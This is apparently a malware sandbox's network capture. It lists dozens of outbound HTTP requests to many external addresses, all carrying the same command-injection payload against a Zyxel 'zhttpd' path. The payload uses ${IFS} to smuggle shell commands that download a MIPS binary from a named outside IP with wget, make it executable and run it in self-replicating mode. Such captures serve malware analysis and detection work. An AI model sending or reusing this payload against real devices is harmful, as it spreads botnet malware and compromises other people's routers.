                                                        Feb 2, 2024 06:21:04.838227987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3287192.168.2.144472836.145.58.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838274956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3288192.168.2.1437018193.219.168.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838314056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3289192.168.2.1442488104.148.227.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838330030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3290192.168.2.1445804173.142.24.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838380098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3291192.168.2.1460036141.188.254.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838414907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3292192.168.2.1459312132.25.129.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838468075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3293192.168.2.144052665.189.234.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838495016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3294192.168.2.1451410146.252.10.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838536978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3295192.168.2.143674652.53.92.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838562965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3296192.168.2.14405264.42.19.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838625908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3297192.168.2.1434360201.201.40.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838648081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3298192.168.2.144647481.159.253.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838690996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3299192.168.2.1435848137.166.74.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838707924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3300192.168.2.1453392161.184.79.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838757992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3301192.168.2.1452126105.18.49.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838792086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3302192.168.2.145520840.239.101.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838826895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3303192.168.2.1456570219.140.42.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838881016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3304192.168.2.144968866.77.33.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838913918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3305192.168.2.1433176161.150.176.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838965893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3306192.168.2.1454970162.238.252.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838998079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3307192.168.2.14483029.224.1.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839035034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3308192.168.2.1455574112.191.174.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839067936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3309192.168.2.145870635.239.15.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839121103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3310192.168.2.145395231.192.99.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839154005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3311192.168.2.1457378114.10.194.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839184046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3312192.168.2.145946682.229.82.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839235067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3313192.168.2.1440696207.9.231.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839270115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3314192.168.2.1439254141.236.222.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839309931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3315192.168.2.1449812141.182.243.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839343071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3316192.168.2.144144895.101.127.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839394093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3317192.168.2.145338253.195.89.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839436054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3318192.168.2.1438266169.212.92.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839478016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3319192.168.2.1453848168.202.137.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839525938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3320192.168.2.144577234.34.93.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839548111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3321192.168.2.1452840218.167.230.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839577913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3322192.168.2.144805483.119.147.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839633942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3323192.168.2.144439827.43.155.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839682102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3324192.168.2.145279446.146.121.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839720964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3325192.168.2.143616447.253.236.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839771986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3326192.168.2.14421162.210.71.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839797020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3327192.168.2.145134468.66.91.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839864969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3328192.168.2.1460854149.190.68.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839890003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3329192.168.2.14409289.69.235.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839911938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3330192.168.2.1442726154.205.53.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.839956999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3331192.168.2.1440472132.112.169.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.840008974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3332192.168.2.1443516121.195.223.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.843504906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3333192.168.2.144020297.208.9.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.843535900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3334192.168.2.1444472158.144.16.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.843569040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3335192.168.2.1435596203.126.72.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.851885080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3336192.168.2.1434710190.3.204.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.851916075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3337192.168.2.144181295.228.133.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.851967096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3338192.168.2.143766494.106.102.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852030039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3339192.168.2.1455224211.13.250.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852083921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3340192.168.2.1437898161.6.171.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852121115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3341192.168.2.1455080150.210.108.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852154970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3342192.168.2.144234060.190.56.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852201939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3343192.168.2.14481742.180.12.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852248907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3344192.168.2.1457310151.134.219.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852291107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3345192.168.2.1437816164.172.177.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852308989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3346192.168.2.1454258128.44.182.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852355003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3347192.168.2.1457648195.55.27.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852377892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3348192.168.2.143541682.209.247.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:05.852448940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3349192.168.2.144399278.151.16.245443
                                                        TimestampBytes transferredDirectionData
